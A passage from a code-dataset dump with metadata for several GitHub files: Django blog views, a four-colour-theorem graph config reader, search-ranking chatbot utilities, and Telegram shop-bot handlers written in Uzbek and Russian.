slug=slug)\n posts = group.group_posts.select_related()\n page_number = request.GET.get('page')\n page_obj = paginator(posts).get_page(page_number)\n context = {\n 'page_obj': page_obj,\n 'group': group,\n }\n return render(request, 'posts/group_list.html', context)\n\n\ndef profile(request, username):\n \"\"\"\n Вью функция отвечающая за вывод постов на странице пользователя,\n пагинируется, сортируется от новых к старым и по принадлежности\n к пользователю, 10 постов на страницу.\n Переменная following отвечает за значение кнопки подписки/отписки\n от автора.\n \"\"\"\n author = get_object_or_404(User, username=username)\n following = request.user.is_authenticated and author.following.exists()\n\n posts = author.posts.all()\n page_number = request.GET.get('page')\n page_obj = paginator(posts).get_page(page_number)\n context = {\n 'author': author,\n 'page_obj': page_obj,\n 'following': following\n }\n return render(request, 'posts/profile.html', context)\n\n\ndef post_detail(request, post_id):\n \"\"\"\n Вью функция отвечающая за вывод одного поста\n на страницу детального прсомотра, по id\n \"\"\"\n post = get_object_or_404(Post, id=post_id)\n comment = Comment.objects.filter(post_id=post_id)\n form = CommentForm(request.POST or None)\n context = {\n 'post': post,\n 'comments': comment,\n 'form': form\n }\n return render(request, 'posts/post_detail.html', context)\n\n\n@login_required()\ndef post_create(request):\n \"\"\"\n Вью функция для создания нового поста.\n \"\"\"\n\n form = PostForm(\n request.POST or None,\n files=request.FILES or None,\n )\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n form.save()\n return redirect('posts:profile', post.author)\n return render(request, 'posts/create_post.html', {'form': form})\n\n\n@login_required()\ndef post_edit(request, post_id):\n \"\"\"\n Вью функция для редактирования поста.\n \"\"\"\n post = get_object_or_404(Post, id=post_id)\n\n if post.author != request.user:\n return redirect('posts:post_detail', post_id)\n\n form = PostForm(\n request.POST or None,\n instance=post,\n files=request.FILES or None,\n )\n if form.is_valid():\n form.save()\n return redirect('posts:post_detail', post_id)\n return render(request, 'posts/create_post.html', {'form': form,\n 'is_edit': True})\n\n\n@login_required\ndef add_comment(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n form = CommentForm(request.POST or None)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.post = post\n comment.save()\n return redirect('posts:post_detail', post_id=post_id)\n\n\n@login_required\ndef follow_index(request):\n post_list = Post.objects.filter(author__following__user=request.user)\n page_number = request.GET.get('page')\n page_obj = paginator(post_list).get_page(page_number)\n\n context = {\n 'page_obj': page_obj,\n }\n return render(request, 'posts/follow.html', context)\n\n\n@login_required\ndef profile_follow(request, username):\n author = get_object_or_404(User, username=username)\n user = request.user\n if author != user:\n Follow.objects.get_or_create(user=user, author=author)\n return redirect('posts:follow_index')\n\n\n@login_required\ndef profile_unfollow(request, username):\n author = get_object_or_404(User, username=username)\n obj = Follow.objects.filter(user=request.user, author=author)\n obj.delete()\n\n return redirect('posts:follow_index')\n", "repo_name": "gutolin/hw05_final", "sub_path": "yatube/posts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5370, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Post.objects.select_related", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 19, "usage_type": "name"}, {"api_name": "utils.paginator", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.views.decorators.cache.cache_page", "line_number": 13, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 35, "usage_type": "argument"}, {"api_name": "utils.paginator", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.paginator", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 73, "usage_type": "argument"}, {"api_name": "models.Comment.objects.filter", "line_number": 74, "usage_type": "call"}, {"api_name": "models.Comment.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 74, "usage_type": "name"}, {"api_name": "forms.CommentForm", "line_number": 75, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 90, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 107, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 110, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 102, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 126, "usage_type": "argument"}, {"api_name": "forms.CommentForm", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 138, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.paginator", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 145, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 136, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 150, "usage_type": "call"}, {"api_name": "models.Follow.objects.get_or_create", "line_number": 153, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 153, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 154, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 148, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 159, "usage_type": "call"}, {"api_name": "models.Follow.objects.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 157, "usage_type": "name"}]} +{"seq_id": "7316048174", "text": "import networkx as nx\n\n\nVERTS = 27\t# max number of vertices in a free completion + 1\nDEG = 13\t# max degree of a vertex in a free completion + 1\nEDGES = 62\t# max number of edges in a free completion + 1 \nMAXRING = 14 # max ring size\n\n\ndef main():\n \n # what is this? it is something to do with signed matches\n simatchnumber = [0, 0, 1, 3, 10, 30, 95, 301, 980, 3228, 10797, 36487, 124542, 428506, 1485003]\n\n power = [3**i for i in range(-1,16)]\n ncodes = (power[MAXRING] + 1) / 2\t# max number of codes. What are codes?\n nchar = simatchnumber[MAXRING] / 8 + 2;\n \n with open(\"unavoidable.conf\") as fp:\n lines = [l.strip() for l in fp.readlines()]\n graphs = []\n while lines:\n graph, lines = readSingleConf(lines)\n graphs.append(graph)\n print(\"read {} graphs from config\".format(len(graphs)))\n \n for graph in graphs:\n number_edges(graph)\n \n example = graphs[0].free_completion[1][2]\n print(\"numbered the graphs, the first looks like this {}\".format(example))\n \n \n\nclass ConfigGraph:\n def __init__(self, name, num_vertices, ring_size, cardinality_C, cardinality_Cprime, X, free_completion, coordinates):\n self.name = name\n self.num_vertices = num_vertices\n self.ring_size = ring_size\n self.cardinality_C = cardinality_C\n self.cardinality_Cprime = cardinality_Cprime\n self.X = X\n self.free_completion = free_completion\n self.coordinates = coordinates\n\n def __str__(self):\n return str([self.name, self.num_vertices, self.ring_size, self.X, list(self.free_completion.edges), self.coordinates])\n\n\ndef number_edges(graph: ConfigGraph):\n \"\"\" Numbers edges from 1 up, so that each edge has as many later edges in\n * triangles as possible; the ring edges are first. \"\"\"\n \n h = nx.Graph()\n h.add_edges_from(graph.free_completion.edges)\n \n edge_number = 1\n while h.edges():\n max_edge = max(h.edges(), key = lambda edge: len(set(h[edge[0]]).intersection(h[edge[1]])))\n graph.free_completion[max_edge[0]][max_edge[1]][\"edge_number\"] = edge_number\n h.remove_edge(max_edge[0], max_edge[1])\n edge_number += 1\n\n\ndef readSingleConf(lines):\n name = lines[0]\n num_vertices, ring_size, cardinality_C, cardinality_Cprime = map(int, lines[1].split())\n x_data = lines[2].split()[1:]\n X = [map(int, x_data[i:i+2]) for i in range(0, len(x_data), 2)]\n \n G = nx.Graph()\n adjacency_lines = lines[3:3 + num_vertices]\n split_lines = [line.split() for line in adjacency_lines]\n edges = [(int(line[0]),int(y)) for line in split_lines for y in line[2:]]\n G.add_edges_from(edges)\n \n i = 0\n coordinates = []\n while 3 + num_vertices + i < len(lines) and lines[3 + num_vertices + i]:\n line = lines[3 + num_vertices + i]\n coordinates.extend([int(l) for l in line.split()])\n i += 1\n \n return ConfigGraph(\n name, \n num_vertices, \n ring_size, \n cardinality_C, \n cardinality_Cprime,\n X, \n G,\n coordinates), lines[4 + num_vertices + i:]\n\nif __name__ == \"__main__\":\n main()", "repo_name": "kevinpetersavage/fourcolour", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "networkx.Graph", "line_number": 54, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "70013413926", "text": "import re\nfrom common.log import logger\nimport requests\nfrom thefuzz import fuzz\nfrom thefuzz import process\nimport jieba\nfrom rank_bm25 import BM25Okapi\n\ndef is_chinese(string):\n \"\"\"\n 判断字符串是否为中文\n \"\"\"\n pattern = re.compile(r'[\\u4e00-\\u9fa5]')\n match = pattern.search(string)\n return match is not None\n\n\ndef relevance_by_bm25(query, docs):\n query_token = list(jieba.cut_for_search(query))\n doc_token = [list(jieba.cut_for_search(d)) for d in docs]\n bm25 = BM25Okapi(doc_token)\n return bm25.get_scores(query_token)\n\ndef get_google_search_content(query):\n try:\n url = 'http://127.0.0.1:8084/openai/session/google_search'\n headers = {'Content-Type': 'application/json'}\n data = {'query': query}\n response = requests.post(url, headers=headers, json=data)\n data = response.json()['data'][:3]\n titles_dict = {d['title']: d for d in data if len(d.get('content', \"\")) > 100}\n titles = list(titles_dict.keys())\n title_contents = [t + '\\n\\r' + titles_dict[t]['content'] for t in titles]\n\n #titles_scores_1 = [fuzz.partial_ratio(query, t) for t in titles]\n #titles_scores_2 = [fuzz.partial_ratio(query, t) for t in title_contents]\n #titles_scores = [titles_scores_1[i] + titles_scores_2[i] for i in range(0, len(titles_scores_1))]\n titles_scores = relevance_by_bm25(query, title_contents)\n\n logger.debug(\"google search titles={} scores={}\".format(titles, titles_scores))\n max_score = max(titles_scores)\n best_title = titles[ [i for i in range(0, len(titles_scores)) if titles_scores[i] == max_score][0] ]\n logger.debug(\"google search best_title={} content={}\".format(best_title, titles_dict[best_title]))\n #logger.info(\"google search res json:{}\".format(response.json()))\n return titles_dict[best_title]\n except Exception as e:\n logger.exception(e)\n return None\n\nif __name__ == '__main__':\n print(is_chinese(\"ssdfdf\"))\n print(is_chinese(\"水电费\"))", "repo_name": "atp798/chatbot", "sub_path": "py_flask/common/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "jieba.cut_for_search", "line_number": 19, "usage_type": "call"}, {"api_name": "jieba.cut_for_search", "line_number": 20, "usage_type": "call"}, {"api_name": "rank_bm25.BM25Okapi", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 29, "usage_type": "call"}, {"api_name": "common.log.logger.debug", "line_number": 40, "usage_type": "call"}, {"api_name": "common.log.logger", "line_number": 40, "usage_type": "name"}, {"api_name": "common.log.logger.debug", "line_number": 43, "usage_type": "call"}, {"api_name": "common.log.logger", "line_number": 43, "usage_type": "name"}, {"api_name": "common.log.logger.exception", "line_number": 47, "usage_type": "call"}, {"api_name": "common.log.logger", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "30485397289", "text": "from run import dp, bot, types, State, UpdateUserState, ClientStateGroup, ProductEditState, AddressStateGroup\nfrom keyboards import start_keyboards, language_keyboards, category_keyboards, products_keyboard, add_cart_keyboards, get_location_keyboards, basket_keyboard\nfrom db.manager import is_authenticated, get_user_language, add_to_cart, get_cart_products, update_cart, get_cart_product, drop_all_cart, set_language\nfrom fetch import is_confirmed, get_categories, get_category_products, get_category, get_product_from_list, baseUrl, get_color, get_product, user_me, get_address, create_order, create_address, update_user\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.storage import FSMContext\nfrom utils import send_message_local, translate_text\nimport json\nimport math\nimport time\nfrom decimal import Decimal\nimport re\n\n# Commands /start and /basket\n\n@dp.message_handler(commands=['start'])\nasync def send_welcome(message: types.Message, state=None): \n language = get_user_language(message.from_user.id)\n me = user_me(telegram_id=message.from_user.id)\n\n\n if is_authenticated(message.from_user.id) == True and me.get(\"detail\") is None:\n return await send_message_local(message.from_user.id, text=f\"Assalomu aleykum {message.from_user.first_name} 😊\\n\\nNima buyurtma qilamiz ?\", lang=language, reply_markup=start_keyboards(lang=language))\n \n # elif is_authenticated(message.from_user.id) and me.get(\"detail\") is None:\n # await bot.delete_message(chat_id=message.from_user.id, message_id=message.message_id)\n\n # return await send_message_local(message.from_user.id, \"Siz telefon raqamingizni tasdiqlamadingiz! Tasdiqlash uchun /verification komandasini ni yuboring\", lang=language)\n\n await ClientStateGroup.language.set()\n\n await bot.send_message(chat_id=message.from_user.id, text=f\"\"\"\n Assalomu Alaykum! Bizning botdan foydalanish uchun ro'yxatdan o'ting\\n\\nЗдравствуйте! Чтобы пользоваться нашим ботом вам необходимо пройти регистрацию.\n \"\"\")\n\n await bot.send_message(chat_id=message.from_user.id, text=f\"\"\"\n Tilingizni tanlang\\n\\nВыберите ваш язык\n \"\"\", reply_markup=language_keyboards)\n\n\n\n\n@dp.message_handler(commands=['basket'])\nasync def basket(message: types.Message):\n products = get_cart_products(message.from_user.id)\n text = \"\"\n overall_price = 0\n\n for index, product in enumerate(products):\n square = product[1]\n product = json.loads(product[0])\n lang = get_user_language(message.from_user.id)\n\n\n\n name = product.get(\"name\")\n product_id = product.get(\"id\")\n price = product.get(\"price_sum\")\n slug = product.get(\"slug\")\n blackout = product.get(\"blackout\")\n square_ = re.findall(r\"[-+]?(?:\\d*\\.*\\d+)\", square)\n w = float(square_[0])\n h = float(square_[1])\n \n\n all_square = w * h\n all_price = float(price) * all_square\n overall_price = overall_price + all_price\n \n \n url = f\"{baseUrl}/product/{slug}\"\n \n\n text += f\"{index + 1}. {name} - {blackout} ️𝖚𝖗𝖑 \\nОбш кв: {square}\\n\\n\"\n\n overall_price = str(int(overall_price))\n\n showPrice = f\"{overall_price[slice(-9, -6)]} {overall_price[slice(-6, -3)]} {overall_price[-3:]}\"\n \n text += f\"Общ.цена: {showPrice} сум\"\n\n\n await bot.send_message(message.from_user.id, text, reply_markup=basket_keyboard(len(products)))\n\n\n\n@dp.message_handler(commands=['address'])\nasync def address(message: types.Message, state=None):\n if is_authenticated(message.from_user.id):\n language = get_user_language(message.from_user.id)\n address = get_address(message.from_user.id)\n\n if address == False:\n await AddressStateGroup.city.set()\n await send_message_local(message.from_user.id, \"Shaharni kiriting:\", language)\n else:\n await send_message_local(message.from_user.id, \"Siz allaqachon address kiritgansiz.\", language)\n else:\n await send_message_local(message.from_user.id, \"Siz Ro'yhatdan o'tmaagansiz yoki Telefon nomeringizni tasdiqlamagansiz.\", language)\n\n\n\n\n# Functions\n\n\n\ndef products_text(category, current_page, user_id):\n products = get_category_products(category_id=category.get('id'), page=int(current_page))\n language = get_user_language(user_id)\n \n if products != False:\n page_size = products.get(\"page_size\") \n total = products.get(\"total\") \n \n\n if int(total) > int(page_size):\n all_page = int(total) / int(page_size)\n all_page = math.ceil(all_page)\n else:\n all_page = 1\n\n text = f'{translate_text(\"Sahifa\", language)} {current_page}/{int(all_page)}\\n\\n'\n\n for index, product in enumerate(products.get('results')):\n name = product.get('name')\n weight = product.get('weight')\n price_sum = product.get('price_sum')\n slug = product.get('slug')\n\n text += f'{index + 1}. {name}-{weight} {price_sum} сум.\\nhttps://jalyuzi.com/product/{slug} \\n\\n'\n \n return text\n \n return False\n\n# Address\n\n@dp.message_handler(state=AddressStateGroup.city)\nasync def city_handler(message: types.Message, state=FSMContext):\n language = get_user_language(message.from_user.id)\n\n async with state.proxy() as data:\n data['city'] = message.text\n \n await AddressStateGroup.next()\n await send_message_local(message.from_user.id, \"Tumani kiriting: \", language)\n\n\n@dp.message_handler(state=AddressStateGroup.district)\nasync def district_handler(message: types.Message, state=FSMContext):\n language = get_user_language(message.from_user.id)\n\n async with state.proxy() as data:\n data['district'] = message.text\n\n await AddressStateGroup.next()\n\n\n await send_message_local(message.from_user.id, \"Mahala va Uyni kiriting: \", language)\n\n\n\n@dp.message_handler(state=AddressStateGroup.house)\nasync def house_handler(message: types.Message, state=FSMContext):\n language = get_user_language(message.from_user.id)\n\n async with state.proxy() as data:\n data['house'] = message.text\n\n data_obj = {\n \"city\": data['city'],\n \"state\": data['district'],\n \"address\": data['house'],\n }\n\n dt = create_address(message.from_user.id, json.dumps(data_obj))\n\n await state.finish()\n await send_message_local(message.from_user.id, \"Address muvaffaqiyatli kiritilindi.\", language)\n\n\n# Message handlers - \n\n\n\n@dp.message_handler(Text(equals=[\"🛍 Sotib olish\", \"🛍 Покупка\"], ignore_case=True))\nasync def to_shop(message: types.Message):\n language = get_user_language(message.from_user.id)\n\n\n await send_message_local(message.from_user.id, \"Kategoriyalar\", lang=language, reply_markup=category_keyboards(lang=language))\n\n\n@dp.message_handler(content_types=['location'])\nasync def get_location(message: types.Location):\n me = user_me(telegram_id=message.from_user.id)\n msg = f\"telegramId: {message.from_user.id}\\nИмя: {message.from_user.first_name}\\nUsername: @{message.from_user.username}\\nТип: Быстрый заказ\\nТел.номер:{me.get('phone_number')}\\nЛокация: {message.location.latitude}, {message.location.longitude}\"\n\n await bot.send_message(\"-1001875684284\", msg)\n\n\n await bot.send_message(message.from_user.id, \"Buyurtma qabul qilindi tez orada siz bilan bog'lanamiz\")\n\n\n@dp.message_handler(Text(equals=[\"🚀 Tezkor Buyurtma\", \"🚀 Быстрый заказ\"], ignore_case=True))\nasync def to_shop(message: types.Message):\n language = get_user_language(message.from_user.id)\n\n await send_message_local(message.from_user.id, \"Lokatsiyani yuboring\", lang=language, reply_markup=get_location_keyboards(lang=language))\n\n \n\n\n@dp.message_handler(Text(equals=[\"⬅️ Назад\", \"⬅️ Orqaga\"], ignore_case=True))\nasync def to_start(message: types.Message):\n await send_welcome(message)\n\n\n\n\n@dp.message_handler()\nasync def handle_message(message: types.Message, state=None):\n language = get_user_language(message.from_user.id)\n user = user_me(message.from_user.id)\n\n for category in get_categories():\n\n if message.text == category.get('name'):\n category_id = category.get(\"id\")\n\n per_page = len(get_category_products(category_id=category_id, page=1).get('results'))\n\n text = products_text(category=category, current_page=1, user_id=message.from_user.id)\n \n await bot.send_message(message.from_user.id, text=text, reply_markup=products_keyboard(per_page=per_page, category_id=category_id, current=1))\n\n if message.text == f\"Изменение имени({user.get('first_name')})\" or message.text == f\"Ismni o'zgartirish({user.get('first_name')})\":\n \n await UpdateUserState.first_name.set()\n await send_message_local(message.from_user.id, \"Yangi ism kiriting: \", language)\n\n elif message.text == f\"Смена фамилии({user.get('last_name')})\" or message.text == f\"Familiyani o'zgartirish({user.get('last_name')})\":\n await UpdateUserState.last_name.set()\n await send_message_local(message.from_user.id, \"Yangi familiya kiriting: \", language)\n\n\n\n\n\n@dp.message_handler(state=UpdateUserState.first_name)\nasync def first_name(message: types.Message, state=FSMContext):\n lang = get_user_language(message.from_user.id)\n user = user_me(message.from_user.id)\n\n async with state.proxy() as data:\n data['first_name'] = message.text\n data['last_name'] = \"message.text\"\n\n\n data = {\n \"first_name\": message.text,\n \"last_name\": str(user.get(\"last_name\"))\n }\n\n\n resp = update_user(message.from_user.id, json.dumps(data))\n resp = json.loads(resp.text)\n\n if resp.get(\"ok\"):\n await state.finish()\n\n await send_message_local(message.from_user.id, \"Ism o'zgardi\", lang)\n await send_welcome(message)\n\n else:\n await send_message_local(message.from_user.id, resp, lang)\n\n\n\n\n@dp.message_handler(state=UpdateUserState.last_name)\nasync def last_name(message: types.Message, state=FSMContext):\n lang = get_user_language(message.from_user.id)\n user = user_me(message.from_user.id)\n\n data = {\n \"first_name\": user.get(\"first_name\"),\n \"last_name\": message.text \n }\n\n\n resp = update_user(message.from_user.id, json.dumps(data))\n resp = json.loads(resp.text)\n\n if resp.get(\"ok\"):\n await state.finish()\n await send_message_local(message.from_user.id, \"Familiya o'zgardi\", lang)\n await send_welcome(message)\n\n else:\n await send_message_local(message.from_user.id, resp, lang)\n\n\n\n\n# Callback query - handler\n\n@dp.callback_query_handler()\nasync def change_message(callback: types.CallbackQuery, state=None):\n\n \n cat_id = str(callback.data)[9:]\n basket_id = str(callback.data)[7:]\n\n\n current = re.findall(r'\\d+', callback.data)\n\n if len(current) > 0:\n current = current[-1]\n\n\n # Buy products\n\n if callback.data == \"basket_reset\":\n drop_all_cart(callback.from_user.id)\n language = get_user_language(callback.from_user.id)\n\n await send_message_local(callback.from_user.id, \"Korzinka tozalandi.\", language)\n\n \n\n elif callback.data == \"basket_buy\":\n \n products = get_cart_products(callback.from_user.id)\n text = \"\"\n overall_price = 0\n order_products = []\n \n address = get_address(callback.from_user.id)\n lang = get_user_language(callback.from_user.id)\n \n\n if address:\n len_of_product = len(products)\n\n for index, product in enumerate(products):\n square = product[1]\n product = json.loads(product[0])\n\n\n name = product.get(\"name\")\n product_id = product.get(\"id\")\n price = product.get(\"price_sum\")\n slug = product.get(\"slug\")\n blackout = product.get(\"blackout\")\n square_ = re.findall(r\"[-+]?(?:\\d*\\.*\\d+)\", square)\n w = float(square_[0])\n h = float(square_[1])\n \n\n all_square = w * h\n all_price = float(price) * all_square\n\n overall_price = overall_price + all_price\n\n\n order_products.append({\n \"product\": product_id,\n \"product_price\": price,\n \"overall_price\": int(overall_price),\n \"size\": square,\n \"type_id\": \"None\",\n \"status\": \"pending\",\n \"address\": address[0].get(\"id\"),\n \"amount\": 1\n })\n\n\n data = create_order(telegram_id=callback.from_user.id, data=json.dumps(order_products))\n drop_all_cart(callback.from_user.id)\n if len_of_product >= 1:\n\n await bot.send_message(callback.from_user.id, translate_text(f\"Sizning buyurtmangiz qabul qilindi.\\nTez orada administratorlar siz bilan bo'glanishadi \", lang))\n\n else:\n await bot.send_message(callback.from_user.id, translate_text(f\"Siz address kiritmagan ekansiz!\", lang) + \"\\n/address\")\n\n\n # Basket handler \n\n elif str(callback.data) == f\"basket_{basket_id}\":\n language = get_user_language(callback.from_user.id)\n\n products = get_cart_products(callback.from_user.id)\n product = json.loads(products[int(basket_id) - 1][0])\n product_id = product.get(\"id\")\n product_name = product.get(\"name\")\n\n await ProductEditState.square.set()\n\n\n async with state.proxy() as data:\n data['product_id'] = product_id\n\n await bot.send_message(callback.from_user.id, translate_text(f\"{product_name} Tovarning kengligini va balandligini metr o'lcho'vida yuboring.\\nShunaqangi tartibda yuboring:\\n\", language) + \"2x3\")\n\n # Next and back handler\n\n for index, category in enumerate(get_categories()):\n category_id = category.get(\"id\")\n\n\n if callback.data == f\"next_{category.get('id')}_{current}\":\n \n category_id = category.get(\"id\")\n\n next_i = int(current) + 1\n current = str(next_i)\n \n category_products = get_category_products(category_id=category_id, page=next_i) \n\n if category_products != False:\n await bot.delete_message(callback.from_user.id, callback.message.message_id)\n per_page = len(category_products.get('results'))\n else:\n per_page = 1\n\n text = products_text(category=category, current_page=str(next_i), user_id=callback.from_user.id)\n\n if text != False:\n return await bot.send_message(callback.from_user.id, text=text, reply_markup=products_keyboard(per_page=per_page, category_id=category_id, current=str(next_i)))\n return await callback.answer(\"Not found\")\n\n elif callback.data == f\"back_{category.get('id')}_{current}\":\n if int(current) > 1:\n category_id = category.get(\"id\")\n back_i = int(current) - 1\n current = str(back_i)\n \n category_products = get_category_products(category_id=category_id, page=back_i)\n\n if category_products != False:\n await bot.delete_message(callback.from_user.id, callback.message.message_id)\n per_page = len(category_products.get('results'))\n else:\n per_page = 1\n \n text = products_text(category=category, current_page=str(back_i), user_id=callback.from_user.id)\n\n if text != False:\n return await bot.send_message(callback.from_user.id, text=text, reply_markup=products_keyboard(per_page=per_page, category_id=category_id, current=str(back_i)))\n \n return await callback.answer(\"Not found\")\n\n # Get product handler\n\n for let in range(1, 13):\n page_current = callback.data[7:8]\n\n if str(callback.data) == f\"page_{let}_{page_current}_{cat_id}\":\n\n \n language = get_user_language(callback.from_user.id)\n\n product = get_product_from_list(category_id=cat_id, page=page_current, index=let)\n photo_product = baseUrl + product.get(\"image\")\n # photo_product = \"http://www.jalyuzi.uz/image/cache/catalog/photos/item/tkanVer/diamond-03212-228x228.jpg\"\n name = product.get(\"name\")\n weight = product.get(\"weight\")\n color_id = product.get(\"color\")\n\n if len(color_id) >= 1:\n color_id = product.get(\"color\")[0]\n color = get_color(color_id).get(\"name\")\n else:\n color = \"Нет\"\n \n open_site = translate_text(\"Saytda ko'rish\", language)\n product_slug = product.get(\"slug\")\n\n url = f'{open_site} 🌐' \n category_name = get_category(cat_id).get(\"name\")\n price = product.get(\"price_sum\")\n\n text = f\"{translate_text('Tovar nomi', language)}: {name},\\n{translate_text('Lenta kengligi', language)}: {weight},\\n{translate_text('Kategoriya', language)}: {category_name},\\n{translate_text('Rang', language)}: {color}\\n{translate_text('narxi', language)}: {price} сум\\n\\n{url}\" \n\n\n await bot.send_photo(chat_id=callback.from_user.id, photo=str(photo_product), caption=text, reply_markup=add_cart_keyboards(lang=language, product_slug=product_slug))\n\n # Add to cart handler\n\n if str(callback.data)[:7] == 'product':\n language = get_user_language(callback.from_user.id)\n\n slug = str(callback.data)[8:]\n product = get_product(slug)\n\n if product is not None:\n if is_authenticated(callback.from_user.id):\n status = add_to_cart(callback.from_user.id, json.dumps(product))\n \n if status:\n return await bot.send_message(callback.from_user.id, str(translate_text(\"Mahsulot savatga muvaffaqiyatli qo‘shildi\", language)) + ' ✅\\n/basket')\n else:\n msg = await bot.send_message(callback.from_user.id, str(translate_text(\"Mahsulot korzinkaga qoshilib bo'lingan\", language)) + ' ❌\\n/basket')\n time.sleep(2)\n await bot.delete_message(callback.from_user.id, msg.message_id)\n\n# State \n\n@dp.message_handler(state=ProductEditState.square)\nasync def square_handle(message:types.Message, state=FSMContext):\n first_letter = str(message.text)[:1]\n last_letter = str(message.text)[-1]\n language = get_user_language(message.from_user.id)\n\n if first_letter.isdigit() and last_letter.isdigit():\n async with state.proxy() as data:\n data['square'] = message.text\n product_id = data['product_id']\n\n update_cart(message.from_user.id, product_id, message.text)\n await state.finish()\n return await bot.send_message(message.from_user.id, translate_text(\"Ummumiy kv muvafiqiyatli o'zgardi ✅\", language) + '\\n/basket')\n\n \n else:\n return await send_message_local(message.from_user.id, \"Iltimos tepada misol qilib keltirilgandaka kiritin!\", language)\n\n\n", "repo_name": "Abdulvoris101/Jalyuzi-bot", "sub_path": "core/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 19640, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "run.types.Message", "line_number": 17, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 17, "usage_type": "name"}, {"api_name": "db.manager.get_user_language", "line_number": 18, "usage_type": "call"}, {"api_name": "fetch.user_me", "line_number": 19, "usage_type": "call"}, {"api_name": "db.manager.is_authenticated", "line_number": 22, "usage_type": "call"}, {"api_name": "utils.send_message_local", "line_number": 23, "usage_type": "call"}, {"api_name": "keyboards.start_keyboards", "line_number": 23, "usage_type": "call"}, {"api_name": "run.ClientStateGroup.language.set", "line_number": 30, "usage_type": "call"}, {"api_name": "run.ClientStateGroup.language", "line_number": 30, "usage_type": "attribute"}, {"api_name": "run.ClientStateGroup", "line_number": 30, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 32, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 32, "usage_type": "name"}, {"api_name": "run.bot.send_message", "line_number": 36, "usage_type": "call"}, {"api_name": "run.bot", "line_number": 36, "usage_type": "name"}, {"api_name": "keyboards.language_keyboards", "line_number": 38, "usage_type": "name"}, {"api_name": "run.dp.message_handler", "line_number": 16, "usage_type": "call"}, {"api_name": "run.dp", "line_number": 16, "usage_type": "name"}, {"api_name": "run.types.Message", "line_number": 44, "usage_type": "attribute"}, {"api_name": "run.types", "line_number": 44, "usage_type": "name"}, {"api_name": "db.manager.get_cart_products", "line_number": 